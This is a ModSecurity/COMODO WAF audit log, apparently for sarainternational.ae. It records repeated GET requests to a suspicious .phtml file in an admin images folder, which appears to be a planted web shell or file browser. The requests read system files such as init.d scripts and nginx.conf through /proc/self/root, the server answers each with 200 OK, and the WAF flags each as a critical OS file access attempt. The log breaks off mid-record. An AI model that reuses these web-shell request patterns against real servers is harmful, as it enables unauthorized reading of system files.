"aFCJUKRT9PYLci8mxb0XZQAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108496379503 4645 (- - -) Stopwatch2: 1750108496379503 4645; combined=2316, p1=349, p2=1813, p3=39, p4=30, p5=85, sr=94, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7e7b3776-Z-- --f56f4f34-A-- [17/Jun/2025:02:45:01.768870 +0530] aFCJVaC450Yw050Ymr0PvwAAAAk 216.73.216.71 32810 127.0.0.1 7081 --f56f4f34-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Funattended-upgrades HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --f56f4f34-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3683 Connection: close Content-Type: text/html; charset=UTF-8 --f56f4f34-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/unattended-upgrades"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJVaC450Yw050Ymr0PvwAAAAk"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/unattended-upgrades"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJVaC450Yw050Ymr0PvwAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108501763047 5905 (- - -) Stopwatch2: 1750108501763047 5905; combined=3380, p1=498, p2=2639, p3=58, p4=44, p5=141, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f56f4f34-Z-- --2cf0462b-A-- [17/Jun/2025:02:45:02.313931 +0530] aFCJVk3CmevS3xeTzmo86gAAAAQ 216.73.216.71 32848 127.0.0.1 7081 --2cf0462b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Fpostfix HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --2cf0462b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4137 Connection: close Content-Type: text/html; charset=UTF-8 --2cf0462b-E-- --2cf0462b-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/postfix"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJVk3CmevS3xeTzmo86gAAAAQ"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/postfix"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJVk3CmevS3xeTzmo86gAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108502309255 4733 (- - -) Stopwatch2: 1750108502309255 4733; combined=2613, p1=514, p2=1887, p3=40, p4=30, p5=142, sr=141, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2cf0462b-Z-- --fa7e7021-A-- [17/Jun/2025:02:45:09.139215 +0530] aFCJXY9-jD-p9NsZWnAgJwAAAAE 216.73.216.71 33904 127.0.0.1 7081 --fa7e7021-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fnginx&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fnginx%2Fnginx.conf.default HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --fa7e7021-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3444 Connection: close Content-Type: text/html; charset=UTF-8 --fa7e7021-H-- Message: Warning. Matched phrase "etc/nginx/nginx.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/nginx/nginx.conf found within ARGS:viewfile: /proc/self/root/etc/nginx/nginx.conf.default"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/nginx/nginx.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/nginx/nginx.conf found within ARGS:viewfile: /proc/self/root/etc/nginx/nginx.conf.default"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJXY9-jD-p9NsZWnAgJwAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108509134615 4654 (- - -) Stopwatch2: 1750108509134615 4654; combined=2403, p1=373, p2=1894, p3=37, p4=39, p5=60, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fa7e7021-Z-- --af876440-A-- [17/Jun/2025:02:45:48.112234 +0530] aFCJhE3CmevS3xeTzmo9DAAAAAQ 216.73.216.71 42964 127.0.0.1 7081 --af876440-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Flvm2 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --af876440-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3393 Connection: close Content-Type: text/html; charset=UTF-8 --af876440-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/lvm2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJhE3CmevS3xeTzmo9DAAAAAQ"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/lvm2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJhE3CmevS3xeTzmo9DAAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108548108342 3946 (- - -) Stopwatch2: 1750108548108342 3946; combined=2107, p1=397, p2=1547, p3=37, p4=39, p5=87, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --af876440-Z-- --60eeb722-A-- [17/Jun/2025:02:45:52.482791 +0530] aFCJiE3CmevS3xeTzmo9EgAAAAQ 216.73.216.71 33502 127.0.0.1 7081 --60eeb722-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Fcron HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --60eeb722-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4280 Connection: close Content-Type: text/html; charset=UTF-8 --60eeb722-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/cron"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJiE3CmevS3xeTzmo9EgAAAAQ"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/cron"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJiE3CmevS3xeTzmo9EgAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108552477743 5113 (- - -) Stopwatch2: 1750108552477743 5113; combined=2798, p1=463, p2=2135, p3=55, p4=43, p5=102, sr=145, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --60eeb722-Z-- --db2fc47b-A-- [17/Jun/2025:02:45:55.210296 +0530] aFCJi0cTB7P_sALtclADIAAAAAI 216.73.216.71 33876 127.0.0.1 7081 --db2fc47b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Fssh HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --db2fc47b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4152 Connection: close Content-Type: text/html; charset=UTF-8 --db2fc47b-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/ssh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJi0cTB7P_sALtclADIAAAAAI"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/ssh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJi0cTB7P_sALtclADIAAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108555205847 4504 (- - -) Stopwatch2: 1750108555205847 4504; combined=2490, p1=349, p2=1983, p3=39, p4=32, p5=87, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --db2fc47b-Z-- --bdeabe16-A-- [17/Jun/2025:02:46:44.145547 +0530] aFCJvKRT9PYLci8mxb0XwwAAAAM 216.73.216.71 39074 127.0.0.1 7081 --bdeabe16-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Flvm2-lvmpolld HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --bdeabe16-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3336 Connection: close Content-Type: text/html; charset=UTF-8 --bdeabe16-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/lvm2-lvmpolld"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJvKRT9PYLci8mxb0XwwAAAAM"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/lvm2-lvmpolld"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJvKRT9PYLci8mxb0XwwAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108604141082 4530 (- - -) Stopwatch2: 1750108604141082 4530; combined=2509, p1=369, p2=1972, p3=44, p4=34, p5=90, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bdeabe16-Z-- --256d7639-A-- [17/Jun/2025:02:46:46.590926 +0530] aFCJvqEB9lmWsOo-rPOOTAAAAAU 216.73.216.71 39470 127.0.0.1 7081 --256d7639-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Fhwclock.sh HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --256d7639-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3737 Connection: close Content-Type: text/html; charset=UTF-8 --256d7639-E-- --256d7639-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/hwclock.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJvqEB9lmWsOo-rPOOTAAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/hwclock.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJvqEB9lmWsOo-rPOOTAAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108606509058 81935 (- - -) Stopwatch2: 1750108606509058 81935; combined=157724, p1=409, p2=1691, p3=53, p4=30, p5=77819, sr=98, sw=0, l=0, gc=77722 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --256d7639-Z-- --7268305b-A-- [17/Jun/2025:02:46:47.422668 +0530] aFCJv03CmevS3xeTzmo9SgAAAAQ 216.73.216.71 39582 127.0.0.1 7081 --7268305b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Finit.d&viewfile=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Finit.d%2Fprocps HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --7268305b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3545 Connection: close Content-Type: text/html; charset=UTF-8 --7268305b-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/2582/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/2582/etc/init.d/procps"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/2582/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJv03CmevS3xeTzmo9SgAAAAQ"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/2582/etc/init.d/procps"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJv03CmevS3xeTzmo9SgAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108607418218 4504 (- - -) Stopwatch2: 1750108607418218 4504; combined=2358, p1=359, p2=1838, p3=38, p4=33, p5=90, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7268305b-Z-- --07a67558-A-- [17/Jun/2025:02:46:49.606853 